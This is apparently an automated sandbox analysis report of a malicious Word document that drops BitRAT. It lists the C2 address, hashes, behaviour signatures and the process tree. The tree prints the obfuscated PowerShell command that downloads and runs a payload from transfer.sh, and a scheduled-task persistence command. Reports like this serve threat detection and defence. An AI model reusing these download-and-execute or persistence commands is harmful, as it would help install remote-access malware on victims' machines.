Analysis

  • max time kernel
    84s
  • max time network
    109s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2023 15:13

General

  • Target

    Zapitvane_MACH_BULGARIA_EOOD_09_2023.doc

  • Size

    199KB

  • MD5

    3b92906782599469acffd05ba041942e

  • SHA1

    522183445616d131f3edf13e6ea93c9f19c9f52f

  • SHA256

    edce16eadba8d19990b2ff2e97420f07c1f4defe813ffe961f9cd777f8368b7b

  • SHA512

    c1f8a1259327db79f98467d2a9e2dce172c39e78541476722863eb7b6fa5c39f41c39ad574e7e0b65ed4ab0d8a7201665df1463f2aeaa2d456634c94e71e0f33

  • SSDEEP

    3072:NAN+svPwMrFoXiURMf8yS/TSTIs6sCbMD3itIm0QqgxJi+m:W33JodRU8yS/dLsZDyp0QZC

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Zapitvane_MACH_BULGARIA_EOOD_09_2023.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4412
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\ggxnw.exe;C:\Users\Public\ggxnw.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\ggxnw.exe;C:\Users\Public\ggxnw.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2120
        • C:\Users\Public\ggxnw.exe
          "C:\Users\Public\ggxnw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:644
          • C:\Users\Public\ggxnw.exe
            "C:\Users\Public\ggxnw.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:5084
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
            5⤵
              PID:4212
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:5020
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:2092
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c copy "C:\Users\Public\ggxnw.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
              5⤵
                PID:2008
      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        C:\Users\Admin\AppData\Roaming\pint\pint.exe
        1⤵
        • Executes dropped EXE
        PID:4760

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q5gisxbt.ig1.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        1.9MB

        MD5

        452fde89cfceaa35059fcc8d1f40cfff

        SHA1

        16d6c23ab1970847579ef1af7d9bc67ba08b3235

        SHA256

        3c785998bf637f552d089958d04c10d40b572b7ae8a5130ee976ebc102b45fd5

        SHA512

        c9292fd95af5d3006968713e367e41f30feff3635737b2ad88f0ea3a0c694bde7f03b86d761f5f366325c3a7d1a730506cd01e5dda7afefdabd34fa9613d3003

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        108KB

        MD5

        76e709bca8f5995dc25727fe17141d31

        SHA1

        7e845c9ecde11e1336fed573cab70a501874106c

        SHA256

        87a63e6e9269f88209f7bec34c95a2c51f10957c3e572c1190546d46ae752505

        SHA512

        0d2724c2d5511fff17765a33746cb2b193398986a93d5f0a7fa9b0cc7dff2d8ecfc1bc832eb81b44a20ebc08c994d8ee0d66549e24a167ad90231cb83741a228

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\ggxnw.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\ggxnw.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\ggxnw.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • memory/644-72-0x0000000005760000-0x0000000005D04000-memory.dmp
        Filesize

        5.6MB

      • memory/644-71-0x0000000000420000-0x00000000007F8000-memory.dmp
        Filesize

        3.8MB

      • memory/644-70-0x00000000746D0000-0x0000000074E80000-memory.dmp
        Filesize

        7.7MB

      • memory/644-73-0x00000000051A0000-0x00000000051B0000-memory.dmp
        Filesize

        64KB

      • memory/644-80-0x00000000746D0000-0x0000000074E80000-memory.dmp
        Filesize

        7.7MB

      • memory/2120-61-0x000002453F8D0000-0x000002453F8E0000-memory.dmp
        Filesize

        64KB

      • memory/2120-35-0x00007FFE587E0000-0x00007FFE592A1000-memory.dmp
        Filesize

        10.8MB

      • memory/2120-58-0x000002453F8D0000-0x000002453F8E0000-memory.dmp
        Filesize

        64KB

      • memory/2120-57-0x00007FFE587E0000-0x00007FFE592A1000-memory.dmp
        Filesize

        10.8MB

      • memory/2120-47-0x000002453FA10000-0x000002453FA32000-memory.dmp
        Filesize

        136KB

      • memory/2120-46-0x000002453F8D0000-0x000002453F8E0000-memory.dmp
        Filesize

        64KB

      • memory/2120-36-0x000002453F8D0000-0x000002453F8E0000-memory.dmp
        Filesize

        64KB

      • memory/2120-68-0x00007FFE587E0000-0x00007FFE592A1000-memory.dmp
        Filesize

        10.8MB

      • memory/4412-20-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-1-0x00007FFE46A30000-0x00007FFE46A40000-memory.dmp
        Filesize

        64KB

      • memory/4412-22-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-32-0x000001FFD3160000-0x000001FFD4130000-memory.dmp
        Filesize

        15.8MB

      • memory/4412-33-0x000001FFD3160000-0x000001FFD4130000-memory.dmp
        Filesize

        15.8MB

      • memory/4412-34-0x000001FFD3160000-0x000001FFD4130000-memory.dmp
        Filesize

        15.8MB

      • memory/4412-21-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-19-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-18-0x00007FFE44260000-0x00007FFE44270000-memory.dmp
        Filesize

        64KB

      • memory/4412-17-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-16-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-48-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-49-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-54-0x000001FFD3160000-0x000001FFD4130000-memory.dmp
        Filesize

        15.8MB

      • memory/4412-55-0x000001FFD3160000-0x000001FFD4130000-memory.dmp
        Filesize

        15.8MB

      • memory/4412-56-0x000001FFD3160000-0x000001FFD4130000-memory.dmp
        Filesize

        15.8MB

      • memory/4412-15-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-14-0x00007FFE44260000-0x00007FFE44270000-memory.dmp
        Filesize

        64KB

      • memory/4412-12-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-13-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-10-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-11-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-9-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-8-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-7-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-6-0x00007FFE46A30000-0x00007FFE46A40000-memory.dmp
        Filesize

        64KB

      • memory/4412-3-0x00007FFE46A30000-0x00007FFE46A40000-memory.dmp
        Filesize

        64KB

      • memory/4412-5-0x00007FFE46A30000-0x00007FFE46A40000-memory.dmp
        Filesize

        64KB

      • memory/4412-2-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/4412-0-0x00007FFE46A30000-0x00007FFE46A40000-memory.dmp
        Filesize

        64KB

      • memory/4412-4-0x00007FFE869B0000-0x00007FFE86BA5000-memory.dmp
        Filesize

        2.0MB

      • memory/5084-99-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-89-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-84-0x00000000745E0000-0x0000000074619000-memory.dmp
        Filesize

        228KB

      • memory/5084-78-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-86-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-87-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-88-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-100-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-90-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-91-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-92-0x0000000074960000-0x0000000074999000-memory.dmp
        Filesize

        228KB

      • memory/5084-93-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-94-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-101-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-96-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-98-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-85-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-77-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-95-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-102-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-105-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-106-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-107-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-110-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-111-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-112-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-113-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-116-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-117-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-118-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-122-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-76-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5084-74-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB